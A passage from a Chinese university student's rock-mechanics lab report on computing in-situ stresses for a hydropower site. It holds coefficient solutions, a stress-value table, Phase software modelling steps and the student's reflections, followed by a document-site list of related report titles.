1,0,-5722.6,0,157216.5]; b=[-5.89743;-5.96718;-5.14663;-6.09015;-3.22697;-7.4026;-5.3528;-4.5534;-3.1199; -2.883;0.000382689;0.000148407;0.000008756;0.000083127;0.000111185];5.5、利用以上模型来求解,从中任意选取10组可求A1,A2,A3,A4,A5和B1,B2,B3,B4,B5的值分别如下: A1=-0.0007, A2=0, A3=-1E-10, A4=-1E-09, A5=3E-09, B1=0.00013, B2=-0.0003, B3=-2E-09, B4=6.5E-10, B5=1.7E-09 5.6、根据以上的系数A1,A2,A3,A4,A5,B1,B2,B3,B4,B5可将研究区域的不同坐标值找出,利用以下式子求出σx,σy,τxy值: α*A1+2αX*A3+αY*A5+λ*B2+2λY*B4+λX*B5=σx λ*A1+2λX*A3+λY*A5+α*B2+2αY*B4+αX*B5=σy B1+2X*B3+Y*B5+A2+2Y*A4+X*A5=τxy/G 求得的实验数据见表3: X σy Y σx τxy-270030.1-300000 26.10190827 23.443972-3.3845051-248837-300000 26.01878553 22.919628-3.1933399-236123.4-300000 25.96892114 22.60508-3.0786621-196566.8-300000 25.81377387 21.6264-2.7218553-184185.2-300000 25.76521133 21.320064-2.6101715-153965.8-300000 25.64668607 20.572399-2.3375878-123746.4-300000 25.52816081 19.824733-2.0650041-93526.95-300000 25.40963555 19.077067-1.7924204-60145.15-300000 25.2787069 18.25116-1.4913115-26763.34-300000 25.14777826 17.425253-1.1902025 6618.4692-300000 25.01684961 16.599346-0.8890936 45416.512-300000 24.86467765 15.639435-0.5391294 73948.703-300000 24.75276995 14.933514-0.2817648 104011.98-300000 24.6348571 14.189711-0.0105895 134075.26-300000 24.51694425 13.445909 0.26058577 164138.53-300000 24.3990314 12.702106 0.53176105 175764.95-300000 24.35343079 12.414454 0.63663307 217176.63-300000 24.19100772 11.389878 1.01017268 258588.32-300000 24.02858465 10.365302 1.38371229-300000 267798.0381-0.913855697 6.8671631-3.0855215-300000 235596.0762 0.624976383 7.8493492-3.1178096-300000 203394.1143 2.163808463 8.8315352-3.1500977-300000 158059.4885 4.330209902 10.214278-3.1955536-300000 124366.9978 5.940269739 11.241926-3.2293362-300000 90674.50712 7.550329576 12.269575-3.2631188-300000 56982.01644 9.160389413 13.297223-3.2969014-300000 42538.32465 9.850608735 13.737767-3.3113838-300000 10072.42382 11.40205364 14.728004-3.3439365-300000-22393.477 12.95349854 15.71824-3.3764892-300000-49054.7592 14.22755869 16.531431-3.4032218-300000-75716.0413 *** 17.344622-3.4299544-300000-113096.701 17.28792486 18.484762-3.4674351-300000-150477.361 19.07423088 19.624903-3.5049157-300000-187858.021 20.8605369 20.765043-3.5423964-300000-225238.68 22.64684292 21.905184-3.579877-300000-262619.34 24.43314895 23.045324-3.6173577-300000-300000 26.21945497 24.185465-3.6548383 表格3:不同坐标的应力值 5.7、在Phase中设定边界应力值导入所求的模型,即可得到所需的实验模型。模型如图1所示: 图1:实验模型图 四、实验成果 由以上的模型,在phase软件中经过计算,可建立如下图所示的成果: 图2:maximum shear strain图 图3:strength factor 图 五、实验中遇到的问题及心得体会 本题是岩石力学的基本实验之一,旨在通过学习了一些岩石力学的基本知识,来实地计算某地的地应力。本题以九龙河溪古水电站地质构造为实验数据的基础,来对该地区的地应力值进行了定量的计算。实验的过程中,由于是第一次接触岩石力学phase软件,也遇到了一定的问题。具体来说可以概括如下: 1、工程力学基础知识学得不是特别的扎实,致使在已知了理塘、雅江、呷巴、长河坝、乾宁的最大主应力及最小主应力后,处理实验数据花了一定的时间,利用公式xy2(xy2)2x2花费了一定的时间,此题可用应力圆的方法来计算,使问题得到一定的简化。 2、由于知识的局限性,所学的matlab知识也不是特别的熟练。此题本来也可以excel来解决问题,求解线性方程组也有一定的方便,但关于这方面的知识自己学得不是特别的精通,致使用了matlab软件来解决。本题在一定的程度上也反映matlab的局限性,如在求解的过程中,可从中选取任意15个线性方程组中的10组数据来解决需要求的系数A1,A2,A3,A4,A5,B1,B2,B3,B4,B5。但matlab不能够显示数据过于小的数据,因此在运行的过程中,会遇到显示-Inf的情况,此方式就表示了在matlab的情况下,不能正常的显示数据。如果采用excel来解决问题,或许不会遇到这样类似的问题。 3、实验过程中,对计算模型的思路不清晰。致使在做题的过程中,在得出一些实验数据之后,不能进行下一步的正确操作。只有在等到老师讲解了一些相关的步骤之后,才会有一定的思路。同是,对模型也不是特别的清楚,由于phase软件全部是英文的命令,所以在操作的过程中,也有了一定的难度。在实验时,我不仅遇到了一些难题,而且还转了一定的圈子。比如在添加在Phase软件中设定边界应力值时,由于不知道实验的条件,所以给模型的四周都设定了边界的应力值,但之后在计算时,却出现了一定的问题。之后经过老师的讲解,才知道另外两边的值是不需要加的。这不仅给计算的过程带来了冗杂,而且也浪费了不少的时间。 通过本次实验,我也深刻的认识到了自己所学的知识的局限性。岩石力学phase软件,auto CAD 2006,matlab 6.5软件以及microsoft office 2003软件这些有用的学习软件,在以后学习的过程中我一定要抽空来熟练这些软件的。同时,我也深刻地认识到了计算机软件对工程类的巨大作用。通过对一些实验数据的收集,在软件中解决这些实际的问题,的确给我们的学习和工作带来了一定的方便。特别是对于这研究地质类的软件来说,我想如果可以的话,还可以考虑地震力的作用,来研究和预测地震,这些都是有极大地帮助。或者将所研究的模型来通过进一步的研究,并考虑其他的因素,来分析不同地质深度的地应力的变化情况,以对研究地质构造将有极大的帮助。 通过本次实验,我也只是分析和计算了岩石力学实验的一些初级东西。由于phase软件的强大性,我想通过一定的方式,还可以从模型中研究出一些新的东西,这对于学习本软件和岩石力学更深的知识,都是有极大的帮助的。当然,这些也只有通过以后进一步的学习了。 最后,感谢王老师给我们这样的一次实验机会,也感谢她在实验过程中给我的指导和帮助。第二篇:中南大学 数据结构实验报告
第三篇:中南大学 网络安全实验报告
第四篇:中南大学网络安全实验报告
第五篇:岩石力学-实验报告
![下载中南大学基础力学实验报告[五篇范文]word格式文档](http://static.xiexiebang.com/skin/default/images/icon_word.png){kind=icon}
点击咨询 